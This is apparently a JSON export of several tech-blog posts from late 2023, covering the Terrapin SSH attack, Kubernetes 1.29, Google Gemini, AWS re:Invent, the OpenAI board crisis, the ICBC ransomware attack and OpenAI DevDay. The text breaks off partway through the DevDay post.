What they can do is strip certain security features that are negotiated at the start of the connection.\nThe most concrete impact is against OpenSSH\u0026rsquo;s chacha20-poly1305@openssh.com cipher and the keystroke timing countermeasures introduced in OpenSSH 9.5. An attacker could disable these countermeasures, potentially making keystroke timing analysis attacks viable again. For most server administration tasks, this is a modest risk. For high-security environments, it\u0026rsquo;s worth taking seriously.\nWhat To Do About It # OpenSSH 9.6, released alongside this disclosure, introduces a strict key exchange mode that prevents the attack. Both client and server need to support the new extension for it to be effective. The mitigation adds the kex-strict-s-v00@openssh.com and kex-strict-c-v00@openssh.com extension markers and resets sequence numbers after key exchange, closing the manipulation window.\nFor immediate practical steps:\nUpdate OpenSSH to 9.6 on both clients and servers.\nIf you can\u0026rsquo;t update immediately, consider disabling ChaCha20-Poly1305 and the encrypt-then-MAC modes in your SSH configuration, falling back to AES-GCM, which is not affected.\nAudit your cipher configurations; this is a good time to review what your SSH config actually allows versus what you need.\nCheck your systems with the Terrapin vulnerability scanner released by the researchers.\nOther implementations are also releasing patches. PuTTY, libssh, Paramiko, and others were all part of the coordinated disclosure.\nThe Bigger Picture # What fascinates me about Terrapin is what it reveals about the assumptions we make about mature protocols. SSH has been scrutinized by security researchers for over two decades. It\u0026rsquo;s one of the protocols we trust most implicitly; I use it dozens of times a day without thinking twice. 
And yet, a subtle interaction between sequence number handling and the handshake transition created a vulnerability that went unnoticed for years.\nThis pattern repeats throughout security history. TLS had BEAST, CRIME, POODLE, and Heartbleed. DNS had the Kaminsky attack. Now SSH has Terrapin. The lesson isn\u0026rsquo;t that these protocols are broken — it\u0026rsquo;s that cryptographic protocol security is extraordinarily difficult, and our tools for reasoning about protocol composition and state transitions still have gaps.\nMy Take # As someone who\u0026rsquo;s been using SSH since its early days as a replacement for telnet and rsh, Terrapin is a humbling reminder. The practical risk for most of us is low — you need an active MITM, and the impact is limited to feature downgrade rather than content compromise. But \u0026ldquo;low practical risk\u0026rdquo; isn\u0026rsquo;t the same as \u0026ldquo;no action needed.\u0026rdquo;\nUpdate your SSH implementations over the holiday break. Review your cipher configurations. And take a moment to appreciate the researchers who found this — responsible disclosure of protocol-level vulnerabilities is the kind of security work that makes the entire ecosystem stronger. \u0026lsquo;Tis the season for patching, apparently.\n","date":"21 December 2023","externalUrl":null,"permalink":"/posts/231221-terrapin-ssh-attack-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Researchers disclose the Terrapin attack against SSH, demonstrating that even our most trusted protocols can harbor subtle cryptographic weaknesses.","title":"Terrapin Attack — SSH Isn't As Bulletproof As We Thought","type":"posts"},{"content":"Kubernetes 1.29, codenamed Mandala, dropped this week, and while it may not have the headline-grabbing drama of an AI model launch, this release carries some changes that will genuinely affect how we build and operate containerized workloads. 
After managing container orchestration systems since the early Docker Swarm days, I can appreciate when a release focuses on solving real operational pain points rather than adding flashy new features.\nNative Sidecar Containers: Finally # The headline feature for me is the promotion of native sidecar containers to beta. If you\u0026rsquo;ve ever dealt with the awkward dance of init containers, sidecar proxies, and job completion semantics in Kubernetes, you know this has been a long time coming.\nThe problem was straightforward but surprisingly painful: Kubernetes had no first-class concept of a container that should start before the main application container and run alongside it for the pod\u0026rsquo;s lifetime. Service meshes like Istio worked around this with init containers and lifecycle hooks, but the hacks were fragile. Jobs were particularly problematic — a Job\u0026rsquo;s pod would technically never complete because the sidecar container kept running.\nWith KEP-753, sidecar containers are now defined using restartPolicy: Always on init containers. They start in order before regular containers, run for the pod\u0026rsquo;s lifetime, and are properly terminated during shutdown. It\u0026rsquo;s elegant in its simplicity, and it solves a category of bugs that have plagued service mesh deployments for years.\nNetworking Improvements # The networking side of 1.29 brings several welcome changes. The nftables backend for kube-proxy has reached alpha, beginning the long-overdue migration away from iptables. If you\u0026rsquo;ve ever debugged a cluster with thousands of services and watched iptables rules balloon into an unmanageable mess, you understand why this matters. nftables offers better performance characteristics and a more maintainable rule structure.\nThere\u0026rsquo;s also progress on the Gateway API front, which continues its march toward becoming the standard for ingress and service mesh configuration in Kubernetes. 
The API\u0026rsquo;s maturity is reaching the point where I\u0026rsquo;m comfortable recommending it for new deployments over the traditional Ingress resource. The expressiveness of HTTPRoute and the multi-tenancy story with Gateway classes solve problems that Ingress never could cleanly.\nLoad Balancer IP Mode # A smaller but practical addition is the loadBalancerIPMode feature for Services, which gives you more control over how traffic from cloud load balancers reaches your pods. You can now specify whether the load balancer IP should be treated as a true VIP (routed at the network level) or as a proxy endpoint. This matters for performance-sensitive applications where the extra hop through kube-proxy was adding unwanted latency.\nFor those of us running Kubernetes on the major cloud providers, this kind of fine-grained control over networking behavior is exactly what we need. The default behavior works for most cases, but when you\u0026rsquo;re optimizing for the tail end of your latency distribution, these knobs matter.\nStorage and Scheduling # On the storage front, ReadWriteOncePod access mode is now generally available. This ensures that a PersistentVolumeClaim can only be mounted by a single pod across the entire cluster — not just a single node. It\u0026rsquo;s a subtle but important distinction for stateful workloads where data corruption from concurrent access is a real risk.\nThe scheduler also gained improvements around pod topology spread constraints, making it easier to distribute workloads evenly across failure domains. If you\u0026rsquo;ve wrestled with getting pods spread across availability zones without leaving some zones over-provisioned and others underutilized, the refinements here should help.\nThe Maturity Story # What strikes me most about Kubernetes 1.29 isn\u0026rsquo;t any single feature — it\u0026rsquo;s the pattern. 
The project has clearly shifted from \u0026ldquo;add everything\u0026rdquo; to \u0026ldquo;finish what we started and make operations smoother.\u0026rdquo; Features are graduating from alpha to beta to GA at a steady pace. The rough edges that made Kubernetes painful in production three years ago are being systematically filed down.\nI remember deploying Kubernetes 1.8 and needing a small army of YAML templating tools, custom operators, and tribal knowledge to keep things running. Today\u0026rsquo;s Kubernetes, while still complex, is measurably more operable. The sidecar container support alone will eliminate an entire category of support tickets for teams running service meshes.\nMy Take # Kubernetes 1.29 is a \u0026ldquo;boring in the best way\u0026rdquo; release. No revolutionary new concepts, just steady improvement in areas that matter for production workloads. The sidecar support removes a genuine pain point, the networking improvements lay groundwork for better performance, and the storage and scheduling refinements show a project that\u0026rsquo;s listening to operator feedback.\nIf you\u0026rsquo;re running 1.27 or 1.28, the upgrade path should be smooth — as always, test your admission webhooks and any custom controllers first. If you\u0026rsquo;re still on something older, the accumulated improvements make a compelling case for catching up. 
The Kubernetes ecosystem in late 2023 is mature enough that upgrades are routine rather than stressful, and that itself is a sign of how far we\u0026rsquo;ve come.\n","date":"14 December 2023","externalUrl":null,"permalink":"/posts/231214-kubernetes-129-mandala-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.29 ships with native sidecar container support, improved networking, and a continued push toward simplifying cluster operations.","title":"Kubernetes 1.29 Mandala — Sidecars Finally Graduate","type":"posts"},{"content":"Google just dropped Gemini, and the AI landscape shifted again. After months of speculation and what felt like an eternity of playing catch-up to OpenAI, Google DeepMind has released what they claim is their most capable model to date — one that natively understands text, code, audio, image, and video. Having watched this space for three decades now, I can tell you: the pace of change in 2023 has been unlike anything I\u0026rsquo;ve seen before.\nWhat Makes Gemini Different # The key selling point here isn\u0026rsquo;t just benchmark performance — though Google is certainly eager to highlight that Gemini Ultra reportedly outperforms GPT-4 on several standard benchmarks including MMLU. What\u0026rsquo;s genuinely interesting is the architecture: Gemini was built from the ground up as a multimodal model, not a text model with vision bolted on afterward.\nThis matters more than it might seem at first glance. When you retrofit multimodal capabilities onto a text-first architecture, you get something that can process images but doesn\u0026rsquo;t truly reason across modalities. Google\u0026rsquo;s claim is that Gemini can natively interleave understanding across text, images, audio, and video in a way that feels more integrated. 
Whether that holds up in real-world usage remains to be seen — benchmarks and demos have a way of looking better than production reality.\nThe model comes in three sizes: Ultra (the full powerhouse), Pro (the balanced middle tier already rolling out in Bard), and Nano (designed to run on-device, specifically on the Pixel 8 Pro). That tiered approach is smart — it acknowledges that not every use case needs the biggest model, and on-device inference is where a lot of practical value lives.\nThe Developer Angle # For those of us building applications, the immediate impact comes through the Gemini API, available via Google AI Studio and Vertex AI. Gemini Pro is accessible now, and it slots into the space where many teams have been using GPT-3.5 Turbo — fast, capable, cost-effective.\nWhat I find most compelling from a development perspective is the potential for truly multimodal application logic. Right now, most AI-powered applications treat different input types as separate pipelines: you have your text processing, your image analysis, maybe some audio transcription, and you glue them together with application code. A natively multimodal model opens the door to much simpler architectures where you can throw heterogeneous inputs at a single endpoint and get coherent reasoning back.\nOf course, \u0026ldquo;opens the door\u0026rdquo; and \u0026ldquo;works reliably in production\u0026rdquo; are two very different things. I\u0026rsquo;ve been burned enough times by demo-day promises to maintain healthy skepticism. But the direction is clear, and competition in this space benefits all of us who build on these platforms.\nThe Competitive Landscape # This launch puts real pressure on OpenAI and the open-source community. OpenAI has been the clear front-runner since ChatGPT\u0026rsquo;s launch a year ago, and while Google had Bard and PaLM 2, they never quite matched the developer mindshare that OpenAI captured. 
Gemini feels like a more serious response.\nBut here\u0026rsquo;s what I think matters more than the Google vs. OpenAI narrative: this accelerates the expectation that AI models should be multimodal by default. Meta\u0026rsquo;s Llama 2 pushed open-source text models forward. Now the bar is moving to multimodal capabilities. Mistral just released Mixtral 8x7B this week as well — the open-source ecosystem isn\u0026rsquo;t standing still.\nFor teams evaluating their AI stack, the practical takeaway is that model choice is increasingly about ecosystem fit rather than raw capability. Google\u0026rsquo;s integration with Cloud Platform, OpenAI\u0026rsquo;s partnership with Microsoft Azure, and the flexibility of open-source models all represent different trade-offs that matter more than a few percentage points on benchmarks.\nThe On-Device Story # The Nano variant deserves special attention. Running capable AI models directly on mobile hardware is a game-changer for applications where latency matters, where privacy is a concern, or where connectivity is unreliable. Google shipping this in the Pixel 8 Pro suggests they see on-device AI as a mainstream feature, not a research curiosity.\nI\u0026rsquo;ve been working with edge computing long enough to know that the gap between \u0026ldquo;runs on device\u0026rdquo; and \u0026ldquo;runs well on device\u0026rdquo; can be enormous. But the trajectory is promising. If Gemini Nano delivers even 70% of what the demos suggest, it opens up entire categories of mobile and IoT applications that currently require round-trips to cloud APIs.\nMy Take # After thirty years in this industry, I\u0026rsquo;ve learned to separate signal from noise in product launches. Gemini is signal. It may not immediately dethrone GPT-4 in every benchmark or use case, but it validates the multimodal-native approach and introduces genuine competition at the top of the AI capability spectrum.\nWhat I\u0026rsquo;m watching for is the developer experience. 
The best model in the world doesn\u0026rsquo;t matter if the API is flaky, the documentation is sparse, or the pricing model doesn\u0026rsquo;t work for real applications. Google has historically struggled with developer relations compared to smaller, more focused companies. If they get that right with Gemini, the impact on our industry could be substantial.\nFor now, I\u0026rsquo;d recommend any team currently building with LLMs to allocate some time to evaluate Gemini Pro through the API. Competition is good for all of us, and having viable alternatives to OpenAI\u0026rsquo;s offerings makes our architectures more resilient.\n","date":"7 December 2023","externalUrl":null,"permalink":"/posts/231207-google-gemini-multimodal-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google launches Gemini, its most capable AI model yet, bringing native multimodal reasoning to the forefront of the AI race.","title":"Google Gemini Arrives — Multimodal AI Gets Real","type":"posts"},{"content":"I\u0026rsquo;m writing this from Las Vegas, where AWS re:Invent is in full swing and the message from Amazon couldn\u0026rsquo;t be clearer: AI is being woven into every layer of the cloud stack. After a year where OpenAI and Microsoft dominated the AI narrative, AWS is making its play — not by competing on foundation models alone, but by embedding AI capabilities into the infrastructure and developer tools that millions of organizations already depend on.\nThe keynote announcements from Adam Selipsky and Werner Vogels have been dense, so let me cut through the marketing and highlight what actually matters for developers and infrastructure teams.\nAmazon Q: AWS\u0026rsquo;s AI Assistant Play # The headline announcement is Amazon Q, AWS\u0026rsquo;s new AI assistant designed for enterprise use. Unlike general-purpose chatbots, Amazon Q is specifically built to understand your AWS environment, your codebase, and your business data. 
It comes in several flavors:\nAmazon Q Developer (previously CodeWhisperer Chat) integrates into IDEs and can answer questions about your AWS infrastructure, help debug issues, transform code between frameworks, and even handle Java version upgrades semi-autonomously. This represents AWS\u0026rsquo;s counter to GitHub Copilot and similar AI coding assistants. AWS demonstrated upgrading Java 8 applications to Java 17 with Q handling the bulk of the migration work — not just syntax changes but dependency updates and API migration.\nAmazon Q Business connects to enterprise data sources — S3 buckets, SharePoint, Salesforce, Jira, and about 40 other connectors — and lets employees ask questions about company information in natural language. It includes IAM-aware access controls, meaning answers respect existing permissions.\nThe differentiation from Microsoft Copilot and Google Duet AI is the deep integration with AWS infrastructure. If you\u0026rsquo;re an AWS shop, being able to ask \u0026ldquo;Why is my Lambda function timing out?\u0026rdquo; and get an answer that considers your CloudWatch logs, X-Ray traces, and configuration is genuinely useful. Whether it works as well in practice as in the demo remains to be seen, but the architectural approach is sound.\nGraviton4 and Custom Silicon # AWS continues its custom chip strategy with Graviton4, the fourth generation of their Arm-based processors. The numbers are impressive: 30% better compute performance versus Graviton3, 50% more cores, and 75% more memory bandwidth. The R8g instances powered by Graviton4 are designed for memory-intensive workloads — databases, caching, real-time analytics.\nFor teams that haven\u0026rsquo;t yet migrated to Graviton, the performance-per-dollar advantage keeps widening. 
I\u0026rsquo;ve been running production workloads on Graviton3 for over a year, and the cost savings are real — typically 20-30% versus comparable x86 instances, with equivalent or better performance for most workloads. Graviton4 will extend that advantage.\nOn the AI silicon front, AWS announced Trainium2, their custom chip for training large AI models. They\u0026rsquo;re clustering these into EC2 UltraClusters of up to 100,000 chips connected via high-bandwidth networking. This is AWS\u0026rsquo;s answer to NVIDIA\u0026rsquo;s dominance in AI training — offering an alternative for organizations that can\u0026rsquo;t get enough H100 GPU allocation or want to reduce their dependency on a single silicon vendor.\nZero-ETL and Data Integration # A less flashy but practically significant theme at re:Invent is the expansion of zero-ETL integrations. AWS announced zero-ETL support from additional sources into Amazon Redshift, including Amazon DynamoDB, and new integrations between Aurora and other analytics services.\nFor anyone who\u0026rsquo;s built and maintained ETL pipelines, the appeal is obvious. Data integration is one of those unglamorous but critical parts of infrastructure that consumes enormous engineering time. Every pipeline you don\u0026rsquo;t have to build, monitor, and debug is engineering capacity freed for actual product work.\nThe new Amazon Aurora Limitless Database is also worth noting — it provides automatic horizontal scaling for Aurora PostgreSQL, handling sharding transparently. If you\u0026rsquo;ve ever had to manually shard a PostgreSQL database, you know how painful that process is. 
Having it handled at the database engine level is the kind of infrastructure improvement that won\u0026rsquo;t make headlines but will spare teams a significant operational burden.\nS3 Express One Zone and Storage Innovations # S3 Express One Zone is a new storage class designed for latency-sensitive workloads, delivering single-digit millisecond data access — up to 10x faster than standard S3. It uses a different architecture than traditional S3, with data stored in a single Availability Zone on high-performance storage.\nThis matters for AI/ML workloads where training jobs need to read large datasets quickly, and for analytics workflows where S3 access latency is a bottleneck. The trade-off is reduced resilience compared to standard S3 (data lives in a single AZ rather than being replicated across several), which is acceptable for derived data and intermediate processing results but not for primary data storage.\nThe Broader Pattern # Step back from individual announcements and the strategic pattern is clear. AWS is pursuing a three-layer AI strategy:\nInfrastructure layer: Custom silicon (Graviton, Trainium, Inferentia) and optimized storage/networking for AI workloads.\nModel layer: Amazon Bedrock as a managed service for accessing multiple foundation models (Claude, Llama 2, Titan, Stable Diffusion) without managing infrastructure.\nApplication layer: Amazon Q as the AI-powered interface that sits on top and makes everything accessible.\nThis is a fundamentally different approach from OpenAI\u0026rsquo;s (build the best model and provide API access) or Google\u0026rsquo;s (leverage search and data advantages). AWS is betting that AI value will primarily be captured at the infrastructure and integration layer — that most enterprises will care more about connecting AI to their existing data and workflows than about which specific model is 2% better on benchmarks.\nMy Take # re:Invent 2023 feels like a transition year. The generative AI hype of 2023 is starting to concretize into actual infrastructure and tooling. 
Amazon Q might not be as capable as GPT-4 for general conversation, but it doesn\u0026rsquo;t need to be — it needs to be good enough to answer questions about your AWS bill, your CloudWatch alarms, and your deployment pipeline.\nThe Graviton4 and Trainium2 announcements reinforce something I\u0026rsquo;ve believed for a while: the companies that control the silicon will have significant long-term advantages in AI. AWS, Google, and increasingly Microsoft (via custom chips) are all investing in custom processors because they know that AI workload economics are fundamentally determined by compute efficiency.\nFor infrastructure teams, the practical takeaway is this: if you\u0026rsquo;re on AWS, evaluate Amazon Q Developer when it\u0026rsquo;s generally available, plan your Graviton4 migration for memory-intensive workloads, and look at the zero-ETL integrations to simplify your data pipelines. These aren\u0026rsquo;t revolutionary changes — they\u0026rsquo;re the kind of incremental infrastructure improvements that compound into significant operational advantages over time.\nThe AI revolution will be built on infrastructure. And re:Invent 2023 is AWS reminding everyone that infrastructure is their game.\n","date":"30 November 2023","externalUrl":null,"permalink":"/posts/231130-aws-reinvent-2023-amazon-q/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2023 introduces Amazon Q, Graviton4, and a wave of AI-integrated cloud services that signal where enterprise infrastructure is heading.","title":"AWS re:Invent 2023 — Amazon Q and the AI-Infused Cloud","type":"posts"},{"content":"What a week. If you\u0026rsquo;re just emerging from a Thanksgiving food coma, here\u0026rsquo;s the compressed version: last Friday, OpenAI\u0026rsquo;s board fired CEO Sam Altman. Then president Greg Brockman resigned. Then nearly all of OpenAI\u0026rsquo;s 700+ employees threatened to leave and join Microsoft. 
Then, on Wednesday — yesterday — Altman was reinstated as CEO with a new board. The whole saga played out over five days that felt like five months.\nI\u0026rsquo;ve witnessed plenty of corporate drama over three decades in tech, but I\u0026rsquo;ve never seen anything quite like this. The speed, the stakes, and the sheer chaos were unprecedented. And for those of us who build on OpenAI\u0026rsquo;s platform, this wasn\u0026rsquo;t just corporate theater — it was a stress test of our architectural decisions. The period from GPT-3\u0026rsquo;s launch through ChatGPT\u0026rsquo;s explosive growth to GPT-4\u0026rsquo;s capabilities created unprecedented expectations and dependencies.\nWhat Actually Happened # On Friday, November 17th, OpenAI\u0026rsquo;s board of directors — a six-person nonprofit board — announced that Sam Altman was being removed as CEO because he was \u0026ldquo;not consistently candid in his communications with the board.\u0026rdquo; No further explanation was given. The abruptness was staggering: Altman reportedly learned he was being fired via a Google Meet call minutes before the public announcement.\nGreg Brockman, OpenAI\u0026rsquo;s president and co-founder, was removed from the board and subsequently resigned. Mira Murati was named interim CEO, then replaced within days by Emmett Shear (former Twitch CEO), who himself lasted only until Altman\u0026rsquo;s reinstatement.\nThe most remarkable development was the employee revolt. Over 700 of OpenAI\u0026rsquo;s approximately 770 employees signed a letter threatening to leave and join Microsoft — which had offered to hire the entire staff — unless the board resigned and reinstated Altman. 
Microsoft CEO Satya Nadella publicly confirmed the offer, essentially providing a safety net that made the employees\u0026rsquo; ultimatum credible.\nBy Wednesday, the crisis resolved: Altman returned as CEO, and a new initial board was announced including Bret Taylor (former Salesforce co-CEO), Larry Summers (former US Treasury Secretary), and Adam D\u0026rsquo;Angelo (Quora CEO, the only holdover).\nThe Governance Problem # Beneath the drama lies a genuinely difficult question: how should organizations developing frontier AI be governed?\nOpenAI\u0026rsquo;s unusual structure — a nonprofit board overseeing a capped-profit subsidiary — was explicitly designed to prioritize safety over commercial interests. The board\u0026rsquo;s charter states that its \u0026ldquo;primary fiduciary duty is to humanity.\u0026rdquo; This structure was supposed to be a feature, not a bug: a safeguard ensuring that the pursuit of artificial general intelligence wouldn\u0026rsquo;t be driven purely by profit motives. The broader question of who governs transformative AI platforms had already become central to the industry.\nIn practice, the structure created a governance body with enormous power and limited accountability. A six-person board, several of whom had limited operational experience with the company, could fire the CEO of one of the most valuable and consequential technology companies on earth without consulting employees, investors, or partners. And they did.\nWhether the board had legitimate concerns about Altman\u0026rsquo;s leadership is still unclear. But the execution — firing the CEO with no succession plan, no communication strategy, and no apparent consideration of the operational consequences — was a governance failure regardless of the underlying merits.\nWhat This Means for Developers # For the thousands of companies building on OpenAI\u0026rsquo;s APIs, this week was deeply unsettling. 
Consider the scenario that nearly materialized: OpenAI\u0026rsquo;s entire workforce departing for Microsoft, leaving the company that provides your core AI infrastructure as an empty shell. If you\u0026rsquo;d built your product around the OpenAI API with no fallback plan, you were days away from a potential catastrophe.\nThis should crystallize several architectural principles:\nAbstraction layers aren\u0026rsquo;t optional. If your codebase makes direct OpenAI API calls throughout the application, you have a single point of failure. Wrap your LLM interactions behind an abstraction that can swap providers — whether that\u0026rsquo;s a custom interface, something like LiteLLM, or a framework-level abstraction. The cost of this indirection is minimal; the risk mitigation is substantial.\nMulti-model strategies are prudent. Anthropic\u0026rsquo;s Claude, Google\u0026rsquo;s Gemini (coming soon), Meta\u0026rsquo;s Llama 2, and Mistral\u0026rsquo;s models are all viable alternatives for many use cases. You don\u0026rsquo;t need to run everything through multiple providers today, but you should have tested alternatives and know your migration path.\nEvaluate self-hosted options for critical workloads. Open-source models have improved dramatically. For latency-sensitive or mission-critical applications, running a fine-tuned open model on your own infrastructure eliminates the platform dependency entirely. The performance gap with GPT-4 is real but narrowing.\nThe Microsoft Factor # Microsoft\u0026rsquo;s strategic positioning in AI has always been central to its future, and this crisis revealed the depth of Microsoft\u0026rsquo;s dependence on OpenAI while also demonstrating Microsoft\u0026rsquo;s broader ecosystem power.\nBut the episode also revealed the strange dynamics of the Microsoft-OpenAI relationship. 
Microsoft has invested $13 billion in OpenAI and resells its models through Azure, yet had no board seat and no advance warning that the CEO of its most important AI partner was about to be fired. The new board structure will presumably address this, but the power imbalance between OpenAI\u0026rsquo;s commercial reality and its nonprofit governance was laid bare.\nFor the broader AI ecosystem, the likely outcome is that OpenAI becomes more conventionally corporate. The nonprofit board\u0026rsquo;s power will be curtailed, commercial interests will carry more weight, and the \u0026ldquo;safety-first\u0026rdquo; governance experiment will be significantly diluted. Whether that\u0026rsquo;s good or bad depends on your perspective on AI risk.\nMy Take # The past week demonstrated that the AI industry\u0026rsquo;s most important company was held together by the loyalty of its employees and the financial backing of Microsoft — not by its governance structure. That\u0026rsquo;s a fragile foundation for an organization that many believe is building one of the most transformative (and potentially dangerous) technologies in history.\nFor developers, the lesson is practical: don\u0026rsquo;t bet your product on any single AI provider. This week it was a governance crisis. Next time it could be a pricing change, an API deprecation, a policy shift, or a regulatory action. The history of platform consolidation shows how quickly dependencies become liabilities. The specific risk doesn\u0026rsquo;t matter — what matters is that your architecture can absorb the shock.\nI\u0026rsquo;m glad Altman is back and OpenAI appears stabilized, but I\u0026rsquo;ll be spending this holiday weekend reviewing our own dependencies and making sure we have credible alternatives tested and ready. 
I\u0026rsquo;d encourage you to do the same.\n","date":"23 November 2023","externalUrl":null,"permalink":"/posts/231123-openai-board-crisis-lessons/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The chaotic week at OpenAI — from Sam Altman’s firing to his return — reveals deep tensions in AI governance and raises questions every developer should consider.","title":"The OpenAI Board Crisis — Governance, Trust, and the Future of AI Development","type":"posts"},{"content":"Last week, the Industrial and Commercial Bank of China (ICBC) — the world\u0026rsquo;s largest bank by total assets — confirmed that its US financial services division was hit by a ransomware attack. The attack, attributed to the LockBit ransomware group, disrupted the bank\u0026rsquo;s ability to settle US Treasury trades, forcing ICBC to route transactions through USB sticks delivered by courier to BNY Mellon. Let that sink in: the largest bank on the planet was reduced to sneakernetting data because its systems were locked by criminals.\nIf there was ever an incident that should force the financial sector to take ransomware preparedness seriously at the board level, this is it.\nWhat Happened # The attack targeted ICBC Financial Services (ICBC FS), the bank\u0026rsquo;s US-based broker-dealer subsidiary. On November 9th, LockBit ransomware encrypted systems critical to clearing and settling Treasury market transactions. ICBC FS is a significant player in the US Treasury market, and the disruption was serious enough to temporarily affect Treasury market liquidity.\nAccording to reports from Bloomberg and other financial press, the bank disconnected affected systems and began manual processing of trades. The Financial Times reported that ICBC FS temporarily owed BNY Mellon $9 billion as trades failed to settle through normal channels. 
The bank reportedly paid the ransom, though ICBC hasn\u0026rsquo;t confirmed this publicly.\nLockBit, the ransomware-as-a-service group responsible, has been the most prolific ransomware operation globally throughout 2023. They\u0026rsquo;ve hit hospitals, schools, government agencies, and now one of the world\u0026rsquo;s most systemically important financial institutions.\nThe Unpatched Citrix Bleed Vulnerability # What makes this attack particularly frustrating from a security practitioner\u0026rsquo;s perspective is the apparent attack vector. Multiple security researchers have pointed to CVE-2023-4966, known as \u0026ldquo;Citrix Bleed,\u0026rdquo; as the likely entry point. This information-disclosure flaw in Citrix NetScaler ADC and Gateway devices leaks session tokens, letting attackers hijack existing authenticated sessions and sidestep authentication entirely.\nHere\u0026rsquo;s the timeline that should make every CISO uncomfortable:\nOctober 10: Citrix releases a patch for CVE-2023-4966.\nOctober 18: CISA adds it to its Known Exploited Vulnerabilities catalog.\nOctober 23-24: Mandiant and other researchers report active exploitation in the wild.\nNovember 9: ICBC gets hit, reportedly through an unpatched Citrix device.\nA month. There was a full month between the patch being available and the attack. This isn\u0026rsquo;t a zero-day story — it\u0026rsquo;s a patch management story. And it\u0026rsquo;s depressingly common. The pattern repeats endlessly: critical vulnerability disclosed, patch released, organizations fail to apply it in time, attackers exploit the gap.\nSystemic Risk in Financial Infrastructure # The ICBC attack raises uncomfortable questions about systemic risk in financial market infrastructure. US Treasury markets are the backbone of the global financial system — they\u0026rsquo;re where governments, central banks, and institutions park trillions of dollars. 
A sustained disruption to Treasury clearing could cascade through the entire financial system.\nThe fact that a single compromised entity could disrupt Treasury settlement highlights the concentration risk in market infrastructure. ICBC FS handles a meaningful volume of Treasury repo clearing, and when its systems went down, there was no seamless failover. The manual workarounds — including literally sending data on physical media — demonstrate that business continuity planning at this institution did not adequately account for a full ransomware scenario.\nFor those of us who build and secure systems, this is a sobering reminder. I\u0026rsquo;ve been involved in disaster recovery planning exercises where ransomware scenarios were dismissed as \u0026ldquo;unlikely\u0026rdquo; for critical infrastructure. The ICBC attack should end that complacency permanently.\nLessons for Every Organization # You don\u0026rsquo;t need to be a bank to learn from this incident. Several takeaways apply broadly:\nPatch management remains the highest-leverage security activity. It\u0026rsquo;s not glamorous, it doesn\u0026rsquo;t involve AI or blockchain or whatever the security vendor du jour is selling, but keeping your systems patched against known exploited vulnerabilities is the single most effective thing you can do. If your organization can\u0026rsquo;t patch a critical CISA KEV entry within two weeks, you have a process problem that no technology purchase will fix.\nNetwork segmentation limits blast radius. Early indications suggest that the ransomware was contained to ICBC FS\u0026rsquo;s US operations and didn\u0026rsquo;t spread to the parent bank\u0026rsquo;s broader infrastructure. Whether this was by design or by luck, it demonstrates the value of network segmentation — especially for subsidiaries and divisions that operate in different regulatory environments.\nRansomware response plans must include manual operations. 
Every organization should have documented procedures for operating critical business processes without their primary systems. Test them regularly. If your disaster recovery plan has never been executed, it\u0026rsquo;s not a plan — it\u0026rsquo;s a wish.\nSupply chain and third-party risk is real. The ripple effects of the ICBC attack extended to every counterparty that relied on ICBC FS for settlement. If your business depends on third-party infrastructure, you need to understand their security posture and have contingency plans for their failure.\nMy Take # The ICBC attack is one of those incidents that feels like it should be a turning point but probably won\u0026rsquo;t be. We\u0026rsquo;ve had turning points before — SolarWinds, Colonial Pipeline, the Equifax breach — and each time the industry collectively vows to do better before settling back into the same patterns.\nWhat frustrates me most is the preventability. This wasn\u0026rsquo;t a sophisticated nation-state operation exploiting unknown vulnerabilities. It was a known ransomware group exploiting a vulnerability that had been patched for a month. The tools to prevent this exist. The patches were available. The warnings were issued. And one of the largest financial institutions in the world still got caught.\nIf your organization\u0026rsquo;s patch management process takes more than two weeks for critical vulnerabilities, consider this your wake-up call. 
The next ICBC could be anyone.\n","date":"16 November 2023","externalUrl":null,"permalink":"/posts/231116-icbc-lockbit-ransomware-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The LockBit ransomware attack on ICBC’s US operations disrupted Treasury market trading and exposed critical vulnerabilities in financial infrastructure.","title":"ICBC Ransomware Attack — When the World's Largest Bank Gets Hit","type":"posts"},{"content":"On Monday, OpenAI held its first-ever developer conference — DevDay — in San Francisco, and it was a masterclass in platform strategy. Sam Altman took the stage and rattled off announcements at a pace that left the developer community scrambling to process the implications. Having watched many \u0026ldquo;developer day\u0026rdquo; events over the years, from Apple\u0026rsquo;s WWDC to Microsoft Build, I can say this one packed more consequential announcements per minute than most. GPT-4 had been released only eight months earlier, and the platform had already evolved dramatically.\nThe highlights: GPT-4 Turbo with a 128K context window, a new Assistants API, custom GPTs that anyone can build without code, a GPT Store coming later, significantly reduced pricing, and JSON mode for reliable structured output. Each of these deserves unpacking.\nGPT-4 Turbo: The Numbers That Matter # Building on the foundation of GPT-4, GPT-4 Turbo isn\u0026rsquo;t just a speed bump. The 128K context window — roughly 300 pages of text — fundamentally changes what\u0026rsquo;s architecturally possible. Many of the elaborate RAG (Retrieval Augmented Generation) pipelines that teams have been building over the past year suddenly face a simpler competitor: just stuff more context into the prompt.\nThat\u0026rsquo;s an oversimplification, of course. RAG still has advantages for freshness, cost control, and precision retrieval over truly massive corpora. 
But for a significant category of use cases — analyzing a codebase, processing a long legal document, summarizing a quarter\u0026rsquo;s worth of customer feedback — the 128K window means you can skip the chunking, embedding, and retrieval infrastructure entirely.\nThe pricing is equally significant: GPT-4 Turbo input tokens cost $0.01 per 1K and output tokens $0.03 per 1K, which works out to 3x cheaper on input and 2x cheaper on output than GPT-4. For teams that shelved GPT-4 integration because the unit economics didn\u0026rsquo;t work, it\u0026rsquo;s time to revisit those spreadsheets.\nThe knowledge cutoff has also been updated to April 2023, which eliminates one of the most common complaints developers had when building customer-facing applications. No more awkward \u0026ldquo;I don\u0026rsquo;t know about that, my training data only goes to September 2021\u0026rdquo; moments.\nThe Assistants API: OpenAI\u0026rsquo;s Real Play # While GPT-4 Turbo grabbed the headlines, the Assistants API is arguably the more strategically important announcement. It provides built-in support for persistent threads, code interpreter, knowledge retrieval, and function calling — essentially, OpenAI is productizing the agent framework that hundreds of startups and open-source projects have been building independently.\nIf you\u0026rsquo;ve been using LangChain, LlamaIndex, or AutoGen to orchestrate multi-step AI workflows, you should be paying close attention. The Assistants API handles conversation state management, file uploads for retrieval, and tool execution natively. It\u0026rsquo;s not as flexible as a custom orchestration layer, but it covers 